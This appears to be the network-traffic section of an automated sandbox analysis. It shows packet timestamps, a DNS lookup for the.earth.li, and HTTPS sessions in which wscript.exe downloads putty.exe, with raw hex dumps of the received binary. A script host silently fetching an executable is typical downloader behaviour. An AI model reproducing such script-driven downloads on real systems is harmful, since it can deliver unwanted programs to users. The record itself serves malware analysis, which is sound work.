                  Jan 13, 2023 16:04:35.520483017 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.520514011 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.520562887 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.520770073 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.520864010 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.521353960 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.521440029 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.521450043 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.521475077 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.521518946 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.521734953 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.521807909 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.521821976 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.521881104 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.521898985 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.521958113 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.521972895 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.522032022 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.522047043 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.522108078 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.522120953 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.522182941 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.522196054 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.522254944 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.522270918 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.522330046 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.522370100 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.522429943 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.522449017 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.522505045 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.522525072 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.522582054 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.524136066 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.524214029 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.524255037 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.524271965 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.524282932 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.524657011 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.524734020 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.524744987 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.524776936 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.524816036 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.525770903 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.525850058 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.525885105 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.525903940 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.525924921 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.525954008 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.526634932 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.526736021 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.526752949 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.526822090 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.526827097 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.526844025 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.526890039 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.526907921 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.527530909 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.527633905 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.528646946 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.528752089 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.528763056 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.528825998 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.528831005 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.528886080 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.529357910 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.529439926 CET49700443192.168.2.393.93.131.124
                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Jan 13, 2023 16:04:34.594888926 CET | 58921 | 53 | 192.168.2.3 | 8.8.8.8
                  Jan 13, 2023 16:04:34.615468025 CET | 53 | 58921 | 8.8.8.8 | 192.168.2.3

                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                  Jan 13, 2023 16:04:34.594888926 CET | 192.168.2.3 | 8.8.8.8 | 0xcce | Standard query (0) | the.earth.li | A (IP address) | IN (0x0001) | false

                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                  Jan 13, 2023 16:04:34.615468025 CET | 8.8.8.8 | 192.168.2.3 | 0xcce | No error (0) | the.earth.li |  | 93.93.131.124 | A (IP address) | IN (0x0001) | false
                  • the.earth.li
                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  0 | 192.168.2.3 | 49699 | 93.93.131.124 | 443 | C:\Windows\System32\wscript.exe
                  Timestamp | kBytes transferred | Direction | Data
                  2023-01-13 15:04:35 UTC | 0 | OUT | GET /~sgtatham/putty/latest/w32/putty.exe HTTP/1.1
                  Accept: */*
                  Accept-Language: en-us
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                  Host: the.earth.li
                  Connection: Keep-Alive
                  2023-01-13 15:04:35 UTC | 0 | IN | HTTP/1.1 302 Found
                  Date: Fri, 13 Jan 2023 15:04:35 GMT
                  Server: Apache
                  Location: https://the.earth.li/~sgtatham/putty/0.78/w32/putty.exe
                  Content-Length: 302
                  Connection: close
                  Content-Type: text/html; charset=iso-8859-1
                  2023-01-13 15:04:35 UTC | 0 | IN | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://the.earth.li/~sgtatham/putty/0.78/w32/putty.exe">here</a>.</p><hr><address>Apache Server at


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  1 | 192.168.2.3 | 49700 | 93.93.131.124 | 443 | C:\Windows\System32\wscript.exe
                  Timestamp | kBytes transferred | Direction | Data
                  2023-01-13 15:04:35 UTC | 0 | OUT | GET /~sgtatham/putty/0.78/w32/putty.exe HTTP/1.1
                  Accept: */*
                  Accept-Language: en-us
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                  Host: the.earth.li
                  Connection: Keep-Alive
                  2023-01-13 15:04:35 UTC | 1 | IN | HTTP/1.1 200 OK
                  Date: Fri, 13 Jan 2023 15:04:35 GMT
                  Server: Apache
                  Last-Modified: Fri, 28 Oct 2022 17:30:02 GMT
                  ETag: "168b28-5ec1b9b96afd8"
                  Accept-Ranges: bytes
                  Content-Length: 1477416
                  Connection: close
                  Content-Type: application/x-msdos-program
                  2023-01-13 15:04:35 UTC212INData Raw: 07 00 83 c4 08 b3 01 85 c0 74 27 68 84 cb 4e 00 56 e8 eb b5 07 00 83 c4 08 85 c0 74 15 6a 04 68 b4 e2 4e 00 56 e8 b7 bb 07 00 83 c4 0c 85 c0 0f 94 c3 89 d8 5e 5b c3 cc cc cc cc cc cc cc cc cc cc 55 53 57 56 83 ec 0c 8b 74 24 20 a1 34 00 50 00 31 e0 89 44 24 08 8b 46 08 83 f8 02 74 67 83 f8 01 75 79 8b 46 0c 85 c0 0f 84 85 00 00 00 8b 48 04 85 c9 74 67 83 f9 02 0f 84 5f 01 00 00 83 f9 17 75 42 8b 40 18 66 83 78 08 00 75 4f 66 83 78 0a 00 75 48 66 83 78 0c 00 75 41 66 83 78 0e 00 75 3a 66 83 78 10 00 75 33 66 83 78 12 00 75 2c 66 83 78 14 00 75 25 0f b7 40 16 3d 00 01 00 00 0f 94 c3 eb 19 68 e2 02 00 00 68 8e 44 4f 00 68 ec 6b 4f 00 e8 ba 7b 07 00 83 c4 0c 31 db 8b 4c 24 08 31 e1 e8 e7 83 06 00 89 d8 83 c4 0c 5e 5f 5b 5d c3 8b 46 10 85 c0 74 06 83 7e 14 00
                  Data Ascii: t'hNVtjhNV^[USWVt$ 4P1D$FtguyFHtg_uB@fxuOfxuHfxuAfxu:fxu3fxu,fxu%@=hhDOhkO{1L$1^_[]Ft~
                  2023-01-13 15:04:35 UTC220INData Raw: 3c b5 08 02 4d 00 03 74 17 68 44 01 00 00 68 e8 4e 4f 00 68 7e 64 4f 00 e8 37 5d 07 00 83 c4 0c 89 34 24 89 5c 24 04 89 e0 6a 00 50 ff 37 e8 ae 38 00 00 83 c4 0c 85 c0 74 05 8b 70 08 eb 02 31 f6 8b 4c 24 08 31 e1 e8 45 65 06 00 89 f0 83 c4 0c 5e 5f 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc 53 57 56 83 ec 0c 8b 74 24 20 a1 34 00 50 00 31 e0 89 44 24 08 83 3c b5 48 05 4d 00 03 74 17 68 43 01 00 00 68 e8 4e 4f 00 68 3c 64 4f 00 e8 c0 5c 07 00 83 c4 0c 8b 5c 24 24 8b 7c 24 1c 83 3c b5 08 02 4d 00 03 74 17 68 44 01 00 00 68 e8 4e 4f 00 68 7e 64 4f 00 e8 97 5c 07 00 83 c4 0c 89 34 24 89 5c 24 04 89 e0 6a 00 50 ff 37 e8 0e 38 00 00 83 c4 0c 85 c0 74 07 8b 70 08 85 f6 75 19 68 4e 01 00 00 68 e8 4e 4f 00 68 90 19 4f 00 e8 5f 5c 07 00 83 c4 0c 31 f6 8b 4c 24 08 31
                  Data Ascii: <MthDhNOh~dO7]4$\$jP78tp1L$1Ee^_[SWVt$ 4P1D$<HMthChNOh<dO\\$$|$<MthDhNOh~dO\4$\$jP78tpuhNhNOhO_\1L$1
                  2023-01-13 15:04:35 UTC227INData Raw: cc 53 8b 4c 24 08 8b 41 08 85 c0 74 1a 8a 5c 24 0c 8b 11 38 5c 02 ff 75 0e 83 c0 ff 89 41 08 c6 04 02 00 b0 01 5b c3 31 c0 5b c3 cc cc cc cc cc cc 57 56 6a 00 6a 20 6a 01 e8 33 fa ff ff 83 c4 0c 89 c7 8d 70 04 83 c0 10 c7 47 10 e0 98 43 00 89 47 18 c7 47 14 40 99 43 00 c7 47 0c 00 00 00 00 c7 07 00 02 00 00 c6 47 1c 00 6a 00 6a 01 68 00 02 00 00 e8 f8 f9 ff ff 83 c4 0c 89 47 04 89 47 08 c6 00 00 89 f0 5e 5f c3 cc cc cc cc cc cc cc 57 56 6a 00 6a 20 6a 01 e8 d3 f9 ff ff 83 c4 0c 89 c7 8d 70 04 83 c0 10 c7 47 10 e0 98 43 00 89 47 18 c7 47 14 40 99 43 00 c7 47 0c 00 00 00 00 c7 07 00 02 00 00 c6 47 1c 01 6a 00 6a 01 68 00 02 00 00 e8 98 f9 ff ff 83 c4 0c 89 47 04 89 47 08 c6 00 00 89 f0 5e 5f c3 cc cc cc cc cc cc cc 56 8b 74 24 08 8b 06 83 c6 fc 85 c0 74 16
                  Data Ascii: SL$At\$8\uA[1[WVjj j3pGCGG@CGGjjhGG^_WVjj jpGCGG@CGGjjhGG^_Vt$t
                  2023-01-13 15:04:35 UTC235INData Raw: 24 00 00 00 00 83 7e 24 00 0f 85 e1 fb ff ff 8b 44 24 0c 89 28 c7 45 00 00 00 00 00 56 e8 9f db ff ff 83 c4 04 e9 c6 fb ff ff 90 90 90 90 90 90 90 8b 44 8f 08 83 78 28 00 74 40 89 c2 90 90 90 90 89 d1 8b 52 04 85 d2 75 f7 8b 49 24 8b 54 24 08 89 4c 97 24 31 d2 89 c6 e9 cd fa ff ff 90 90 90 8b 48 28 85 c9 0f 85 b0 fa ff ff 8b 48 24 e9 a8 fa ff ff 31 c9 e9 06 01 00 00 8b 4c 8f 24 89 4e 28 8b 48 04 89 4e 0c 8b 50 14 89 56 1c 85 c9 74 02 89 31 8b 48 24 89 4e 2c 8b 48 08 89 4e 10 8b 50 18 89 56 20 85 c9 74 02 89 31 50 e8 0f db ff ff 83 c4 04 8b 46 18 03 46 14 03 46 1c 03 46 20 83 7e 24 01 83 d8 ff 83 7e 28 01 83 d8 ff 83 7e 2c 01 83 d8 ff 8b 54 24 08 89 44 97 14 83 fa 01 7f 45 89 d0 90 90 90 90 90 90 90 90 90 90 90 90 8b 4c 87 28 85 c9 74 23 89 4c 87 24 8b 4c
                  Data Ascii: $~$D$(EVDx(t@RuI$T$L$1H(H$1L$N(HNPVt1H$N,HNPV t1PFFFF ~$~(~,T$DEL(t#L$L
                  2023-01-13 15:04:35 UTC243INData Raw: 90 8d 5a fd 81 e3 fc 00 00 00 66 3b 8c 5d 0c 04 00 00 74 ad 8d 5a fe 81 e3 fd 00 00 00 66 3b 8c 5d 0c 04 00 00 74 9a 8d 5a ff 81 e3 fe 00 00 00 66 3b 8c 5d 0c 04 00 00 74 87 0f b6 da 66 3b 8c 5d 0c 04 00 00 0f 84 76 ff ff ff 83 c2 04 81 fa 23 01 00 00 75 ab e9 70 ff ff ff 31 c0 8b 34 24 eb 28 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 81 cf 00 dd 00 00 66 89 7c 45 0c 83 c0 01 3d 00 01 00 00 0f 84 21 01 00 00 0f b7 4c 45 0c 89 ca 81 e2 00 fe 00 00 81 fa 00 dc 00 00 74 dd ba 23 00 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 8d 7a fd 81 e7 fc 00 00 00 66 3b 8c 7d 0c 04 00 00 74 ad 8d 7a fe 81 e7 fd 00 00 00 66 3b 8c 7d 0c 04 00 00 74 9a 8d 7a ff 81 e7 fe 00 00 00 66 3b 8c 7d 0c 04 00 00 74 87 0f b6 fa 66 3b 8c 7d 0c 04 00 00 0f 84 76 ff ff ff 83 c2 04 81
                  Data Ascii: Zf;]tZf;]tZf;]tf;]v#up14$(f|E=!LEt#zf;}tzf;}tzf;}tf;}v
                  2023-01-13 15:04:35 UTC251INData Raw: 90 83 c7 01 89 fa 39 d6 7c 27 8d 1c 16 89 df c1 ef 1f 01 df d1 ff 39 0c fd 1c 24 4d 00 72 e2 39 0c fd 18 24 4d 00 76 5b 83 c7 ff 89 fe 39 d6 7d d9 8d 91 02 00 fc ff 81 fa 02 11 fc ff 72 46 be 78 00 00 00 31 d2 eb 12 90 90 90 90 90 90 90 90 90 83 c7 01 89 fa 39 d6 7c 2b 8d 1c 16 89 df c1 ef 1f 01 df d1 ff 39 0c fd fc 2e 4d 00 72 e2 39 0c fd f8 2e 4d 00 76 11 83 c7 ff 89 fe 39 d6 7d d9 eb 02 31 c0 5e 5f 5b c3 b8 02 00 00 00 eb f5 cc 53 57 56 8b 4c 24 10 81 f9 a1 00 00 00 73 0b 85 c9 75 13 31 c0 e9 14 01 00 00 81 f9 fd ff 10 00 0f 86 bc 00 00 00 b8 ff ff ff ff 83 f9 20 0f 82 fa 00 00 00 8d 51 81 83 fa 21 0f 82 ee 00 00 00 8d 91 10 fe f1 ff b8 01 00 00 00 81 fa 10 01 f2 ff 0f 82 d7 00 00 00 be 5b 01 00 00 31 d2 eb 09 83 c7 01 89 fa 39 d6 7c 27 8d 1c 16 89 df
                  Data Ascii: 9|'9$Mr9$Mv[9}rFx19|+9.Mr9.Mv9}1^_[SWVL$su1 Q![19|'
                  2023-01-13 15:04:35 UTC259INData Raw: 00 00 8b 84 24 a0 03 00 00 50 68 40 f8 43 00 68 57 34 4e 00 6a 65 68 44 39 4e 00 56 e8 e0 7f 00 00 83 c4 18 6a 54 e8 56 6e 00 00 83 c4 04 89 84 24 9c 03 00 00 8b 84 24 9c 03 00 00 50 68 40 f8 43 00 68 49 5f 4e 00 6a 62 68 d3 af 4e 00 56 e8 ad 7f 00 00 83 c4 18 6a 55 e8 23 6e 00 00 83 c4 04 89 84 24 98 03 00 00 8b 84 24 98 03 00 00 50 68 40 f8 43 00 68 07 ec 4d 00 6a 72 68 3a 22 4e 00 56 e8 7a 7f 00 00 83 c4 18 68 8e 00 00 00 e8 ed 6d 00 00 83 c4 04 89 84 24 94 03 00 00 8b 84 24 94 03 00 00 50 68 40 f8 43 00 68 d9 41 4e 00 6a 6c 68 f1 41 4e 00 56 e8 44 7f 00 00 83 c4 18 68 8f 00 00 00 e8 b7 6d 00 00 83 c4 04 89 84 24 90 03 00 00 8b 84 24 90 03 00 00 50 68 40 f8 43 00 68 70 3a 4e 00 6a 64 68 6e dc 4d 00 56 e8 0e 7f 00 00 83 c4 18 ff 35 7c 77 4c 00 68 c2 de
                  Data Ascii: $Ph@ChW4NjehD9NVjTVn$$Ph@ChI_NjbhNVjU#n$$Ph@ChMjrh:"NVzhm$$Ph@ChANjlhANVDhm$$Ph@Chp:NjdhnMV5|wLh
                  2023-01-13 15:04:35 UTC267INData Raw: f1 4d 00 8b ac 24 4c 05 00 00 55 e8 c1 53 00 00 83 c4 10 89 c6 6a 00 e8 25 4f 00 00 83 c4 04 89 84 24 88 01 00 00 8b 84 24 88 01 00 00 50 68 c0 63 44 00 68 35 e7 4d 00 6a 00 68 7f 03 4e 00 56 e8 bc 5a 00 00 83 c4 18 83 ff ff 0f 84 95 0a 00 00 83 ff 01 0f 84 8c 0a 00 00 e9 d2 01 00 00 68 bb 20 4e 00 68 e0 f0 4d 00 68 45 f1 4d 00 8b ac 24 4c 05 00 00 55 e8 56 53 00 00 83 c4 10 89 c6 6a 19 6a 4b 6a 02 50 e8 e5 55 00 00 83 c4 10 68 ca f0 4d 00 68 85 b5 4e 00 56 e8 82 5f 00 00 83 c4 0c c7 40 0c 00 00 00 00 6a 10 55 e8 40 55 00 00 83 c4 08 89 c7 50 e8 85 4e 00 00 83 c4 04 89 84 24 9c 01 00 00 8b 84 24 9c 01 00 00 50 68 20 62 44 00 68 ca f0 4d 00 6a 72 68 a7 48 4e 00 56 e8 1c 5a 00 00 83 c4 18 89 47 04 c7 40 0c 01 00 00 00 8b 47 04 c6 40 08 01 57 e8 42 4e 00 00
                  Data Ascii: M$LUSj%O$$PhcDh5MjhNVZh NhMhEM$LUVSjjKjPUhMhNV_@jU@UPN$$Ph bDhMjrhHNVZG@G@WBN
                  2023-01-13 15:04:35 UTC274INData Raw: 8b 7f 2c 85 ff 0f 8e 28 01 00 00 8b 4d 38 f7 df 31 d2 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 3b 04 91 0f 84 fb 00 00 00 8d 34 17 83 fe ff 0f 84 ef 00 00 00 83 c2 01 89 fe 01 d6 75 e2 e9 ef 00 00 00 39 7b 0c 0f 85 ea 00 00 00 ff 74 24 24 57 e8 4a e1 fd ff 83 c4 08 85 c0 0f 88 d5 00 00 00 50 8b 74 24 28 56 57 e8 93 e0 fd ff 83 c4 0c 89 c7 8b 43 08 8b 48 2c 83 c1 ff 51 56 50 e8 1d da fd ff 83 c4 0c 3b 3c 24 0f 84 a7 00 00 00 57 6a 02 55 e8 38 29 ff ff 83 c4 0c ff 34 24 e8 4d 91 fe ff 83 c4 04 89 c6 57 e8 42 91 fe ff 83 c4 04 89 c7 85 f6 75 17 68 8b 01 00 00 68 e4 4c 4f 00 68 90 18 4f 00 e8 c8 81 06 00 83 c4 0c 85 ff 75 17 68 8c 01 00 00 68 e4 4c 4f 00 68 8c 16 4f 00 e8 ad 81 06 00 83 c4 0c 6a 01 55 e8 1f 22 ff ff 83 c4 08 3b 46 54 75 0e ff 77 54 6a 01
                  Data Ascii: ,(M81;4u9{t$$WJPt$(VWCH,QVP;<$WjU8)4$MWBuhhLOhOuhhLOhOjU";FTuwTj
                  2023-01-13 15:04:35 UTC282INData Raw: ff ff 31 f6 eb 1b 31 c0 8b 5c 24 1c 50 55 57 e8 dd c3 fd ff 83 c4 0c 55 57 e8 53 c9 fd ff 83 c4 08 56 6a 43 53 e8 67 0a ff ff 83 c4 0c 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 53 57 56 8b 44 24 20 8b 5c 24 1c 8b 6c 24 18 8b 7c 24 14 83 f8 03 0f 84 aa 00 00 00 85 c0 0f 85 3d 01 00 00 89 d8 8b 5f 14 6a 44 50 e8 5e 03 ff ff 83 c4 08 89 c6 55 57 e8 82 c8 fd ff 83 c4 08 55 57 e8 f8 be fd ff 83 c4 08 f6 c3 01 0f 85 90 00 00 00 f6 c3 02 0f 85 a1 00 00 00 f6 c3 04 0f 85 b2 00 00 00 f6 c3 08 74 11 6a 03 68 0a 86 4e 00 55 57 e8 27 c0 fd ff 83 c4 10 31 c0 f6 c3 01 74 0d b8 01 00 00 00 85 f6 0f 84 ab 00 00 00 f6 c3 02 74 0c 83 fe 01 0f 84 9f 00 00 00 83 c0 01 f6 c3 04 74 0c 83 fe 02 0f 84 8e 00 00 00 83 c0 01 c0 eb 03 83 fe 03 0f 94 c1 31 d2 84
                  Data Ascii: 11\$PUWUWSVjCSg^_[]USWVD$ \$l$|$=_jDP^UWUWtjhNUW'1ttt1
                  2023-01-13 15:04:35 UTC290INData Raw: 14 c7 46 04 00 00 00 00 c7 46 20 00 00 00 00 85 ff 74 0b 57 e8 88 57 ff ff 83 c4 04 eb 02 31 c0 89 46 04 8a 44 24 1c 88 46 24 c7 46 28 05 00 00 00 c6 46 2c 01 c7 46 30 00 00 00 00 c7 46 34 64 00 00 00 c7 46 38 00 00 00 00 c7 46 3c 00 00 00 00 c6 46 40 00 89 f0 5e 5f 5b 5d c3 cc cc cc cc cc 55 53 57 56 8b 7c 24 18 8b 5c 24 14 8b 6c 24 34 6a 00 6a 44 6a 01 e8 f5 ff fe ff 83 c4 0c 89 c6 8d 43 14 6a 00 6a 01 ff 73 10 6a 04 50 ff 73 18 e8 7b 00 ff ff 83 c4 18 89 43 18 8b 4b 10 8d 51 01 89 53 10 89 34 88 c7 06 07 00 00 00 c6 46 08 00 8b 43 0c c1 e0 10 05 00 00 ff ff 89 46 0c 8b 44 24 2c 89 46 1c 8b 44 24 30 89 46 10 89 6e 14 c7 46 04 00 00 00 00 c7 46 20 00 00 00 00 85 ff 74 0b 57 e8 b8 56 ff ff 83 c4 04 eb 02 31 c0 89 46 04 8a 44 24 1c 88 46 24 8b 44 24 20 89
                  Data Ascii: FF tWW1FD$F$F(F,F0F4dF8F<F@^_[]USWV|$\$l$4jjDjCjjsjPs{CKQS4FCFD$,FD$0FnFF tWV1FD$F$D$
                  2023-01-13 15:04:35 UTC298INData Raw: 00 89 d9 ba 01 00 00 00 e8 04 02 00 00 89 06 85 c0 74 35 8d 54 24 1c 8b 4c 24 18 89 f3 81 c3 4c 40 00 00 40 bf 01 00 00 00 0f 44 c7 89 45 f4 8b 02 53 50 ff d1 83 c4 08 89 46 04 8b 08 50 ff 51 18 83 c4 04 85 c0 74 0e 56 e8 73 e1 fe ff 83 c4 04 e9 50 01 00 00 8b 46 04 8b 08 6a 00 50 ff 51 14 83 c4 08 8b 46 08 56 ff 70 08 e8 01 f3 fe ff 83 c4 08 c6 46 10 00 83 7d fc 00 74 40 8b 46 08 6a 00 68 ba 11 4f 00 ff 70 14 68 ab e3 4e 00 e8 4d d4 fe ff 83 c4 10 89 c7 50 e8 f2 62 06 00 83 c4 04 8b 4e 04 8b 11 50 57 51 ff 52 08 83 c4 0c 57 e8 0b e1 fe ff 83 c4 04 c6 46 10 01 c6 46 11 00 c7 86 28 40 00 00 00 00 00 00 c7 46 0c 00 00 00 00 68 d0 04 42 00 e8 f5 f1 fe ff 83 c4 04 89 86 2c 40 00 00 68 b0 61 40 00 e8 e2 f1 fe ff 83 c4 04 89 86 30 40 00 00 68 60 b2 44 00 e8 cf
                  Data Ascii: t5T$L$L@@DESPFPQtVsPFjPQFVpF}t@FjhOphNMPbNPWQRWFF(@FhB,@ha@0@h`D
                  2023-01-13 15:04:35 UTC306INData Raw: 04 12 83 c0 ff 50 56 e8 15 df fe ff 83 c4 08 8b 04 24 85 c0 75 db be 00 01 00 00 03 74 24 04 8b 4c 24 1c 31 e1 e8 a7 0d 05 00 89 f0 83 c4 20 5e 5f 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 57 56 8b 5c 24 18 8b 7c 24 14 8b 74 24 10 83 7e 08 00 74 0e 8d 46 0c 6a 2c 50 e8 d0 b9 fe ff 83 c4 08 83 c6 0c 53 57 56 e8 42 b9 fe ff 83 c4 0c 5e 5f 5b c3 cc cc cc cc cc cc cc cc cc cc cc 53 57 56 8b 5c 24 14 8b 7c 24 10 53 e8 bf 43 06 00 83 c4 04 89 c6 83 7f 08 00 74 0e 8d 47 0c 6a 2c 50 e8 89 b9 fe ff 83 c4 08 83 c7 0c 56 53 57 e8 fb b8 fe ff 83 c4 0c 5e 5f 5b c3 cc cc cc cc 55 53 57 56 8b 74 24 14 8b 46 04 31 db 85 c0 0f 84 82 00 00 00 8b 3e b9 ff ff ff ff 90 90 90 90 80 3c 1f 2c 75 1c 8d 14 1f 83 c2 01 89 16 8d 14 08 89 56 04 83 c3 01 83 c1 ff 39 d8 75 e2
                  Data Ascii: PV$ut$L$1 ^_[SWV\$|$t$~tFj,PSWVB^_[SWV\$|$SCtGj,PVSW^_[USWVt$F1><,uV9u
                  2023-01-13 15:04:35 UTC313INData Raw: 83 c4 04 c3 31 c0 c3 cc cc cc cc cc cc cc cc cc cc 8b 44 24 04 8b 80 7c ff ff ff 8b 08 ff 74 24 18 ff 74 24 18 ff 74 24 18 ff 74 24 18 ff 74 24 18 50 ff 11 83 c4 18 c3 cc cc cc cc cc cc cc cc cc 53 57 56 8b 74 24 10 8b 46 d4 85 c0 74 10 8b 08 50 ff 51 08 83 c4 04 c7 46 d4 00 00 00 00 8b 5c 24 18 8b 7c 24 14 83 7e f8 00 74 19 ff 76 f0 e8 4c 6a 01 00 83 c4 04 c7 46 f0 00 00 00 00 c7 46 f8 00 00 00 00 8b 86 7c ff ff ff 8b 08 53 57 50 ff 51 04 83 c4 0c 5e 5f 5b c3 cc cc cc cc cc cc 56 8b 4c 24 14 8b 44 24 10 8b 54 24 08 83 7a d4 00 74 1c 8d b2 74 ff ff ff 83 c2 bc 51 50 52 e8 1c fa fe ff 83 c4 0c 89 f1 5e e9 91 f9 ff ff 8b 92 7c ff ff ff 8b 32 51 50 ff 74 24 14 52 ff 56 08 83 c4 10 5e c3 cc cc cc cc cc cc cc cc cc cc 8b 44 24 04 83 78 d4 00 74 01 c3 8b 80 7c
                  Data Ascii: 1D$|t$t$t$t$t$PSWVt$FtPQF\$|$~tvLjFF|SWPQ^_[VL$D$T$zttQPR^|2QPt$RV^D$xt|
                  2023-01-13 15:04:35 UTC321INData Raw: 15 ac 33 50 00 89 c6 89 07 85 c0 0f 85 85 00 00 00 8b 44 24 10 85 c0 74 7d 8b 4c 24 50 c7 44 24 04 02 00 00 00 8d 54 24 1c 89 54 24 08 c7 04 24 00 00 00 00 c7 44 24 20 01 00 00 00 8b 11 89 54 24 1c 8b 49 04 89 4c 24 24 c7 44 24 2c 02 00 00 00 89 44 24 28 6a 00 6a 01 50 e8 12 83 fe ff 83 c4 0c 89 44 24 30 89 e0 6a 00 50 6a 00 53 ff 15 b0 33 50 00 89 c6 89 07 85 c0 75 1a 8b 44 24 54 8b 4c 24 28 89 08 8b 4c 24 30 89 48 04 8b 37 eb 05 be 06 00 00 00 8b 4c 24 34 31 e1 e8 b0 ce 04 00 89 f0 83 c4 38 5e 5f 5b c3 cc cc cc cc cc cc cc 57 56 83 ec 2c 8b 7c 24 3c a1 34 00 50 00 31 e0 89 44 24 28 85 ff 74 6a 8b 44 24 44 8b 4c 24 40 c7 07 00 00 00 00 c7 44 24 08 02 00 00 00 8d 54 24 10 89 54 24 0c c7 44 24 04 00 00 00 00 c7 44 24 14 01 00 00 00 8b 11 89 54 24 10 8b 49
                  Data Ascii: 3PD$t}L$PD$T$T$$D$ T$IL$$D$,D$(jjPD$0jPjS3PuD$TL$(L$0H7L$418^_[WV,|$<4P1D$(tjD$DL$@D$T$T$D$D$T$I
